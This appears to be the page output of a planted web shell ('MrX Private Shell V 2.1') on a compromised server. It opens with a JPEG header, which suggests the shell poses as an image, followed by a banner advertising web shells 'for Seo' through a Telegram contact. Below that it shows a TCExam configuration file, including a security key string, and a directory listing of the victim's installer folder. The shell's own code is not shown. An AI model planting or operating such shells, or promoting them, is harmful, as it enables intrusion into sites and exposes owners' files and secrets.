����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
//============================================================+
// File name : tce_general_constants.php
// Begin : 2002-03-01
// Last Update : 2023-11-30
//
// Description : Configuration file for general constants.
//
// License:
// Copyright (C) 2004-2026 Nicola Asuni - Tecnick.com LTD
// See LICENSE file for more information.
//============================================================+
/**
* @file
* Configuration file for general constants.
* @package com.tecnick.tcexam.shared.cfg
* @author Nicola Asuni
* @since 2002-03-01
*/
/**
* String used as a seed for some security code generation.
* SECURITY: this value MUST be unique and secret for every installation. The installer
* (install/tce_functions_install.php) replaces the placeholder below with a random value.
* If it is left at the shipped placeholder (or the historical default), the security
* sensitive result-access token check fails closed - see F_isRandomSecurityConfigured().
*/
define('K_RANDOM_SECURITY', '[[K_RANDOM_SECURITY]]');
/**
* Maximum number of tests per year (last 365 days).
* false = unlimited
*/
define('K_MAX_TESTS_YEAR', false);
/**
* Maximum number of tests per month (last 30 days).
* false = unlimited
*/
define('K_MAX_TESTS_MONTH', false);
/**
* Maximum number of tests per day (last 24 hours).
* false = unlimited
*/
define('K_MAX_TESTS_DAY', false);
/**
* Set to false to disable test counting.
*/
define('K_REMAINING_TESTS', false);
// ---------------------------------------------------------------------
// DO NOT ALTER THE FOLLOWING CONSTANTS
// ---------------------------------------------------------------------
/**
* New line character.
*/
define('K_NEWLINE', "\n");
/**
* Tabulation character.
*/
define('K_TAB', "\t");
/**
* Number of seconds in one minute.
*/
define('K_SECONDS_IN_MINUTE', 60);
/**
* Number of seconds in one hour.
*/
define('K_SECONDS_IN_HOUR', 60 * K_SECONDS_IN_MINUTE);
/**
* Number of seconds in one day.
*/
define('K_SECONDS_IN_DAY', 24 * K_SECONDS_IN_HOUR);
/**
* Number of seconds in one week.
*/
define('K_SECONDS_IN_WEEK', 7 * K_SECONDS_IN_DAY);
/**
* Number of seconds in one month.
*/
define('K_SECONDS_IN_MONTH', 30 * K_SECONDS_IN_DAY);
/**
* Number of seconds in one year.
*/
define('K_SECONDS_IN_YEAR', 365 * K_SECONDS_IN_DAY);
/**
* String used for security feature, do not alter.
*/
define('K_KEY_SECURITY', 'VENFeGFtIChjKSAyMDA0LTIwMjAgTmljb2xhIEFzdW5pIC0gVGVjbmljay5jb20gLSB0Y2V4YW0uY29t');
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| images | Folder | 0755 |
|
|
| php53 | Folder | 0755 |
|
|
| php56 | Folder | 0755 |
|
|
| php71 | Folder | 0755 |
|
|
| php81 | Folder | 0755 |
|
|
| php82 | Folder | 0755 |
|
|
| upgrade | Folder | 0755 |
|
|
| changelog.txt | File | 2.65 KB | 0644 |
|
| check_utf8.php | File | 1.07 KB | 0644 |
|
| clone.php | File | 5.44 KB | 0644 |
|
| edit.php | File | 4.95 KB | 0644 |
|
| edit.xml | File | 433 B | 0644 |
|
| extend.php | File | 11.32 KB | 0644 |
|
| fileindex.php | File | 644 B | 0644 |
|
| import.php | File | 3.35 KB | 0644 |
|
| info.xml | File | 2.48 KB | 0644 |
|
| install.js | File | 921 B | 0644 |
|
| install.php | File | 6.73 KB | 0644 |
|
| install.xml | File | 750 B | 0644 |
|
| md5 | File | 2.84 KB | 0644 |
|
| notes.txt | File | 1.12 KB | 0644 |
|
| tce_config.php | File | 5.94 KB | 0644 |
|
| tce_db_config.php | File | 4.12 KB | 0644 |
|
| tce_general_constants.php | File | 2.46 KB | 0644 |
|
| tce_paths.php | File | 4.72 KB | 0644 |
|
| tcexam.sql | File | 19.1 KB | 0644 |
|
| tcexam.zip | File | 49.69 MB | 0644 |
|
| update_pass.php | File | 298 B | 0644 |
|
| upgrade.php | File | 5.27 KB | 0644 |
|
| upgrade.xml | File | 381 B | 0644 |
|